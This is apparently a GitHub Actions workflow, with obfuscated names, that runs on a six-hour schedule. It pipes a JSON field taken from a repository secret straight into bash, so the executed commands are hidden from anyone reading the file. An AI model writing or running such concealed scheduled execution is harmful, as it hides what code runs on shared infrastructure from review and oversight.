name: xiaomuzhi5678

on:
  workflow_dispatch:
  schedule:
    - cron: '16 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: xiaomuzhi5678
        env:
          frvg8131: ${{ secrets.frvg8131 }}
        run: |
          echo $frvg8131 | jq -r .othn6957 | /bin/bash
          echo $f147 | jq -r .u6 | /bin/bash
          echo $oh1 | jq -r .t9 | /bin/bash

